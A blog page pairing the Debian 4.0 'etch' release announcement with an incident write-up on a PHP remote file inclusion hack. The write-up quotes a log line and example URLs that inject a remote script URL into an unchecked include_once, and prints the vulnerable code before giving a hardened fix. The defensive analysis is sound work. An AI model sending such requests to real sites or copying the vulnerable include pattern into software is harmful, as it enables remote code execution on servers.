Debian GNU/Linux 4.0 released

Debian Etch finally released on 8th April, 2007.
Here is the notice from [email protected].

Debian GNU/Linux 4.0 released

The Debian Project is pleased to announce the official release of Debian
GNU/Linux version 4.0, codenamed "etch", after 21 months of constant
development.  Debian GNU/Linux is a free operating system which supports
a total of eleven processor architectures and includes the KDE, GNOME
and Xfce desktop environments.  It also features cryptographic software
and compatibility with the FHS v2.3 and software developed for version
3.1 of the LSB.

Using a now fully integrated installation process, Debian GNU/Linux 4.0
comes with out-of-the-box support for encrypted partitions.  This
release introduces a newly developed graphical frontend to the
installation system supporting scripts using composed characters and
complex languages; the installation system for Debian GNU/Linux has now
been translated to 58 languages.

Also beginning with Debian GNU/Linux 4.0, the package management system
has been improved regarding security and efficiency.  Secure APT allows
the verification of the integrity of packages downloaded from a mirror.
Updated package indices won't be downloaded in their entirety, but
instead patched with smaller files containing only differences from
earlier versions.

Debian GNU/Linux runs on computers ranging from palmtops and handheld
systems to supercomputers, and on nearly everything in between.  A total
of eleven architectures are supported including:  Sun SPARC (sparc), HP
Alpha (alpha), Motorola/IBM PowerPC (powerpc), Intel IA-32 (i386) and
IA-64 (ia64), HP PA-RISC (hppa), MIPS (mips, mipsel), ARM (arm), IBM
S/390 (s390) and -- newly introduced with Debian GNU/Linux 4.0 -- AMD64
and Intel EM64T (amd64).

Debian GNU/Linux can be installed from various installation media such
as DVDs, CDs, USB sticks and floppies, or from the network.  GNOME is
the default desktop environment and is contained on the first CD.  The K
Desktop Environment (KDE) and the Xfce desktop can be installed through
two new alternative CD images.  Also newly available with Debian
GNU/Linux 4.0 are multi-arch CDs and DVDs supporting installation of
multiple architectures from a single disc.

Debian GNU/Linux can be downloaded right now via bittorrent (the
recommended way), jigdo or HTTP;  see <http://www.debian.org/CD/> for
further information.  It will soon be available on DVD and CD-ROM from
numerous vendors <http://www.debian.org/CD/vendors/>, too.

This release includes a number of updated software packages, such as the
K Desktop Environment 3.5 (KDE), an updated version of the GNOME desktop
environment 2.14, the Xfce 4.4 desktop environment, the GNUstep desktop
5.2, X.Org 7.1, OpenOffice.org 2.0.4a, GIMP 2.2.13, Iceweasel (an
unbranded version of Mozilla Firefox 2.0.0.3), Icedove (an unbranded
version of Mozilla Thunderbird 1.5), Iceape (an unbranded version of
Mozilla Seamonkey 1.0.8), PostgreSQL 8.1.8, MySQL 5.0.32, GNU Compiler
Collection 4.1.1, Linux kernel version 2.6.18, Apache 2.2.3, Samba
3.0.24, Python 2.4.4 and 2.5, Perl 5.8.8, PHP 4.4.4 and 5.2.0, Asterisk
1.2.13, and more than 18,000 other ready to use software packages.

Upgrades to Debian GNU/Linux 4.0 from the previous release, Debian
GNU/Linux 3.1 codenamed "sarge", are automatically handled by the
aptitude package management tool for most configurations, and to a
certain degree also by the apt-get package management tool.  As always,
Debian GNU/Linux systems can be upgraded quite painlessly, in place,
without any forced downtime, but it is strongly recommended to read the
release notes for possible issues.  For detailed instructions about
installing and upgrading Debian GNU/Linux, please see the release notes
<http://www.debian.org/releases/etch/releasenotes>.  Please note that
the release notes will be further improved and translated to additional
languages in the coming weeks.

About Debian
------------

Debian GNU/Linux is a free operating system, developed by more than
a thousand volunteers from all over the world who collaborate via the
Internet.  Debian's dedication to Free Software, its non-profit nature,
and its open development model make it unique among GNU/Linux
distributions.

The Debian project's key strengths are its volunteer base, its dedication
to the Debian Social Contract, and its commitment to provide the best
operating system possible.  Debian 4.0 is another important step in that
direction.

Contact Information
-------------------

For further information, please visit the Debian web pages at
<http://www.debian.org/> or send mail to <[email protected]>.

Security Issue in PHP – include_once

There is an interesting hack in an account of one of our clients on our webhosting service. It is the client's online library system, which is written in PHP. One day, the system admin reported that postfix had died because of a lot of spam mails being sent from the online library system. When I checked the log, I saw lines like the following:

1171167204.920 534343 xxx.xx.xx.xxx TCP_MISS/200 63463 POST http://www.example.com/php/index.php?Name=http://www.geocities.com/meet_kunleb/Login/Meet_KunleB_Mail/Logon.do.txt?

When I went to the PHP file, I found out how the cracker had cracked the system. The problem is in the PHP code.

<?php
...
// Taken straight from the query string; nothing checks what it contains
$pagename = $_GET['Name'];
...
?>
...
<?php include_once("{$pagename}_main.inc"); ?>
...

The problem is that $pagename has no guard to check the value obtained from $_GET['Name'].

The include_once function is allowed to include source from outside the server, for example http://example.com/aaa.php, as long as PHP's allow_url_fopen setting (and, from PHP 5.2 on, allow_url_include) permits URL wrappers.

So, when the cracker uses 'http://example.org/aaa.txt?' as the Name value, that is, requests the URL http://example.com/php/index.php?Name=http://example.org/aaa.txt? ,

$pagename becomes http://example.org/aaa.txt? and the include_once call is executed as:

<?php include_once("http://example.org/aaa.txt?_main.inc"); ?>

This fetches and executes the PHP script at http://example.org/aaa.txt, and "_main.inc" merely becomes the query string (an ARGV) handed to that script, so the suffix restricts nothing. This is a security hole in the system.

So, for security, if it is necessary to use include_once or include with a dynamic path,
the value has to be checked beforehand to make sure it refers to the place you intend.
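As an added example (not code from the original post or from the client's library system), here is a hardened replacement for the dynamic include_once above: the page name is matched against a fixed allowlist and resolved under one local directory, so a URL can never reach include_once. The allowlist contents, the resolve_page() helper and the pages/ directory are assumptions.

```php
<?php
// Added example: hardened form of the include_once shown in the post.
// $ALLOWED_PAGES, resolve_page() and the pages/ directory are hypothetical.

// Only these page names may ever be included. "http://example.org/aaa.txt?"
// is not on the list, so it is rejected before include_once sees it.
$ALLOWED_PAGES = array('home', 'catalog', 'search', 'account');

/**
 * Map the untrusted Name parameter to a file path under $base_dir.
 * Returns the resolved path, or null when the value is not an allowed page.
 */
function resolve_page($name, array $allowed, $base_dir)
{
    // $_GET['Name'] may be an array (Name[]=...) or carry a scheme prefix,
    // path separators or NUL bytes; only a plain identifier gets through.
    if (!is_string($name) || !preg_match('/\A[a-z0-9_]{1,32}\z/', $name)) {
        return null;
    }
    // Exact allowlist match: the identifier check alone would still let a
    // caller include any *_main.inc that happens to exist on disk.
    if (!in_array($name, $allowed, true)) {
        return null;
    }
    // Resolve both paths and confirm the target really lives inside $base_dir.
    $base = realpath($base_dir);
    $real = realpath($base_dir . DIRECTORY_SEPARATOR . $name . '_main.inc');
    if ($base === false || $real === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

$pagename = isset($_GET['Name']) ? $_GET['Name'] : 'home';
$file = resolve_page($pagename, $ALLOWED_PAGES, dirname(__FILE__) . '/pages');
if ($file === null) {
    header('HTTP/1.0 404 Not Found');
    exit('Unknown page');
}
// Only a vetted local path reaches include_once. As a second layer, set
// allow_url_include = Off (PHP 5.2+) or allow_url_fopen = Off in php.ini so
// remote URLs cannot be included even if a check is ever bypassed.
include_once $file;
```

A request with Name=http://example.org/aaa.txt? now fails the identifier check and gets a 404 instead of a remote include, and the squid log line above (a POST with an http:// value in Name) is the pattern to alert on while the fix is rolled out.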